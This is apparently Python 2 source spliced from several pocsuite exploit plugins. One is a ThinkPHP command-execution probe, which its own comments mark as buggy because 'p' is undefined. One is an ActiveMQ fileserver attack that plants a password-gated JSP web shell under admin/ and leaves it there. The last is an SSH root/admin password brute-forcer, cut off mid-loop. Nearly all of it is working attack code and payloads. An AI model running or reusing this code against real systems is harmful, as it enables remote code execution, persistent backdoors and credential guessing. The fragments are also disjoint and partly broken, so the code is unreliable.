        url2 = vul_ip+"/index.php"
        data2 = {"c":"printf","f":"1234567890","method":"filter"}
        try:
            text = req.post(url2,data=data2,timeout=4).text
            if ("printf1234567890filter" in text  or "printffilter1234567890" in text or "1234567890filterprintf" in text or "1234567890printffilter" in text or "filterprintf1234567890" in text or "filter1234567890printf" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass

        # Probe 3: captcha route, command via get[]. BUG: `p` is undefined below.
        url3 = vul_ip+"/public/index.php?s=captcha"
        data3 = {"_method":"__construct","filter[]":"system","method":"get","get[]":"more index.php"}
        try:
            text = req.post(url3,data=data3,timeout=4).text
            if ("thinkphp/start.php" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass

        # Probe 4: same as probe 3 without the /public prefix. BUG: `p` undefined.
        url4 = vul_ip+"/index.php?s=captcha"
        data4 = {"_method":"__construct","filter[]":"system","method":"get","get[]":"more index.php"}
        try:
            text = req.post(url4,data=data4,timeout=4).text
            if ("thinkphp/start.php" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass
        
        # Probe 5: command via server[REQUEST_METHOD]. BUG: `p` undefined.
        url5 = vul_ip+"/public/index.php"
        data5 = {"_method":"__construct","filter[]":"system","server[REQUEST_METHOD]":"more index.php"}
        try:
            text = req.post(url5,data=data5,timeout=4).text
            if ("thinkphp/start.php" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass

        # Probe 6: same as probe 5 without the /public prefix. BUG: `p` undefined.
        url6 = vul_ip+"/index.php"
        data6 = {"_method":"__construct","filter[]":"system","server[REQUEST_METHOD]":"more index.php"}
        try:
            text = req.post(url6,data=data6,timeout=4).text
            if ("thinkphp/start.php" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass

        return self.save_output(result)
    def _attack(self):
        """Attack mode for the ActiveMQ fileserver behind ``self.url`` (default
        port 8161): PUT a JSP into ``/fileserver/``, MOVE it under the admin
        web root, then request it and record a hit when the output contains
        ``uid``.

        Sequence as written: (1) a PUT to a malformed ``/fileserver/%08/..%08/...``
        path whose ``res.reason`` is parsed for the server-side install path;
        (2) a PUT of ``jsp_data`` to ``/fileserver/haha.jsp`` (expects 204);
        (3) a MOVE with a ``Destination: file://<path>admin/haha.jsp`` header
        (expects 204); (4) a GET of ``/admin/haha.jsp?pwd=sec&i=id``.

        Unlike the ``_verify`` methods, this is intrusive: it writes a
        persistent file (``admin/haha.jsp``) to the target that executes the
        ``i`` parameter when ``pwd=sec`` is supplied, and nothing here removes
        it afterwards. From a defender's view the PUT/MOVE pair against
        ``/fileserver/`` and the resulting ``haha.jsp`` under ``admin/`` are
        the artefacts to alert on and clean up.

        NOTE(review): ``re.findall(...)[0]`` raises ``IndexError`` when
        ``res.reason`` does not contain the expected path; like every other
        failure it is caught by the broad handler and only printed.

        Returns:
            ``self.save_output(result)``; ``result['VerifyInfo']`` is present
            only when step (4) returned ``uid`` in its body.
        """
        # result dict returned through save_output()
        result = {}
        # target URL
        vul_url = '%s' % self.url
        # Use the port from the URL if one is set, otherwise the default (8161).
        import re
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = '8161'

        # run the attack chain
        url = 'http://%s:%s' % (_host, _port)
        # print url
        try:
            # Step 1: leak the install path from the error reason phrase.
            get_fileserver_path_url = url + '/fileserver/%08/..%08/.%08/%08'
            res = req.put(url=get_fileserver_path_url,
                          timeout=5,
                          allow_redirects=False)
            # print res.reason
            path = re.findall(r'/.*?(?=fileserver/.*)', res.reason)[0]
            # print path
            # Step 2: upload the JSP.
            put_jsp_url = url + '/fileserver/haha.jsp'
            jsp_data = '''
                        <%
                if("sec".equals(request.getParameter("pwd"))){
                    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
                    int a = -1;
                    byte[] b = new byte[2048];
                    out.print("<pre>");
                    while((a=in.read(b))!=-1){
                        out.println(new String(b));
                    }
                    out.print("</pre>");
                }
            %>
            '''
            res = req.put(url=put_jsp_url,
                          timeout=5,
                          allow_redirects=False,
                          data=jsp_data)
            if res.status_code == 204:
                # print 'ok'
                # Step 3: relocate it under admin/ so it is served as a page.
                headers = {'Destination': 'file://' + path + 'admin/haha.jsp'}
                res = req.request('move',
                                  url=put_jsp_url,
                                  timeout=5,
                                  allow_redirects=False,
                                  headers=headers)
                if res.status_code == 204:
                    # print 'ok'
                    # Step 4: request the page and look for `id` output.
                    exploit_url = url + '/admin/haha.jsp?pwd=sec&i=id'
                    res = req.get(url=exploit_url,
                                  timeout=5,
                                  allow_redirects=False)
                    if 'uid' in res.text:
                        id_info = re.findall(r'(?<=<pre>).*', res.text)[0]
                        print id_info
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = self.url
                        result['VerifyInfo']['Payload'] = exploit_url

        except Exception as e:
            # Any failure in the chain is printed and reported as "no hit".
            print e
        return self.save_output(result)
    def _verify(self):
        result = {}
        vul_url = '%s' % self.url
        import re
        import time
        import paramiko
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = int(url2ip(vul_url)[1])
        else:
            _host = url2ip(vul_url)
            _port = 22

        #判断端口是否开放
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host, _port))
            #print 'Server port is OK!'
        except Exception:
            return self.save_output(result)
        sk.close()

        flag = False
        payload = "弱口令"
        username = [
            "root",
            "admin",
        ]
        password = [
            "", "toor", "1234", "123456", "admin", "Admin", "ADMIN",
            "admin123", "Admin123", "root", "root123", "123.com"
            '123456', 'admin', 'root', 'password', '123123', '123', '1', '',
            'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
            '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou',
            '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123',
            'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd',
            'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t',
            'system', '111111', 'admin', "1", "toor", "1234", "123456",
            "admin", "Admin", "ADMIN", "admin123", "Admin123", "root",
            "root123", "123.com", "ct123!@#"
        ]
        for u in username:
            for p in password:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                try:
                    print p
                    ssh.connect(hostname=_host,
                                port=_port,
                                username=u,
                                password=p,
                                timeout=1,
                                allow_agent=False,
                                look_for_keys=False)
                    #执行命令
                    stdin, stdout, stderr = ssh.exec_command('whoami',
                                                             timeout=1)
                    #获取命令结果
                    resultname = stdout.read().split("\n")[0]
                    if resultname == u:
                        payload += str(u) + ":" + str(p)
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = _host
                        result['VerifyInfo']['Payload'] = payload
                    ssh.close()
                except Exception, ex:
                    ssh.close()